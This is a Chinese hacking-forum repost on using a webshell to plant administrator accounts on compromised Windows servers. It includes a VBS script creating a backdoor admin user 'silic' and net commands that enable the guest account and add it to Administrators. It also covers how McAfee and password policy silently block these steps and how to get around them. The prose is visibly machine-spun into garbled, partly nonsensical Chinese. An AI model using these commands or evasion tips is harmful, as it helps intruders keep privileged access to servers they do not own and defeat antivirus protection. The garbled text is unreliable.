|
|
|
联系客服020-83701501

远程组策略与麦咖啡的那点事

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
远程组策略与麦咖啡的那点事

先看第一件
我们在Windows下操作webshell的时分,通常会如许构建一个经管员账户:
在某个可履行目录构建一个XX.vbs,形式大抵如下:

Default
123456789     set wsnetwork=CreateObject("WSCRIPT.NETWORK")//构建组件    os="WinNT://"&wsnetwork.ComputerName//通信    Set ob=GetObject(os)//获取组件    Set oe=GetObject(os&"/Administrators,group")//administrators用户组    Set od=ob.Create("user","silic")//用户名silic    od.SetPassword "silic"//密码silic    od.SetInfo    Set of=GetObject(os&"/silic",user)    oe.add os&"/silic"

将这段信息保留生计到c:xx.vbs? ?而后在command line中履行

Default
1     cscript c:xx.vbs

如许就失利操作webshell减少了一个经管员。
不过cscript有一个特别很黑白常大的流毒,便是,一般来激昂,如许的vbs减少的账户,称说和密码都特别很是短,而体系通常对账户的密码长度无量制,是在组策略外表的,比方:

33333.png

这个时分,在cscript履行vbs外表通常为无如许的舛误回显的
比方:

Default
1     cscript C:a.vbs & net user

在webshell中得到的倒是

Default
12345678     Microsoft (R) Windows Script Host Version 5.6    Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.     User accounts for W2K3-ARCOIRIS    -------------------------------------------------------------------------------    Administrator            ASPNET                   Guest    SUPPORT_388945a0    The command completed successfully.

而实践情况倒是:

Default
1     The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements.

也便是密码对劲足策略中制约的最低位数哀告

第二事情是关于麦咖啡的。服务器中若是装了杀毒软件切实很正常,要说最佳的,那说甚么的都要。不过若是严重的,还要数麦咖啡
麦咖啡那些事之copy旁注:
假造主机若是对目录权限设定的很严,然而wscript启用的话,大要思考用copy把webshell拷贝到目标目录。不过麦咖啡通常会把这个号令给限制掉,履行溃烂+无回显,可谓是释怀之极,如许的管束让人短暂摸不到头脑:溃烂的原因出在何处?
麦咖啡那些事之taskkill:
这个不必说,人造是被麦咖啡限制死的
麦咖啡那些事之net:
webshell大要net user是比较常见的,不过若是大要

Default
1     net localgroup administrators guest /add

将宾客账户减少到administrators用户组的,一般都大要

Default
12     net user silic silic /add    net user guest 新密码

履行减少账户和变更guest密码这两条号令的。
然而,欢喜剧的是,我net user透露表现The command completed successfully
而后net user silic silic!&11133 /add无回显了,好吧
net user guest /active:yes透露表现The command completed successfully
net user guest silic123!pass无回显了
net localgroup administrators guest /add又透露表现The command completed successfully
我把服务器上的麦咖啡关掉之后,就部分successfully了,麦咖啡这下把我彻底的释怀了一把(以上几条号令凡是在webshell中履行的)

link:http://bbs.blackbap.org/thread-2085-1-1.html

91ri.org:不直接net user而是启用了guest并参与经管员组的门径就能秒杀看似奇幻的麦咖啡杀软,这再次证邃晓一个情理:只若是人治理的步调都会有裂缝,只要不范围于老思维就能创作发明新大陆。

关连文章举荐《[集合]经管system权限3389无法减少的用户情况》

本文由Internet平安攻防研究室(www.91ri.org)信息平安小组搜集整理,转载请说明来由。

数安新闻+更多

证书相关+更多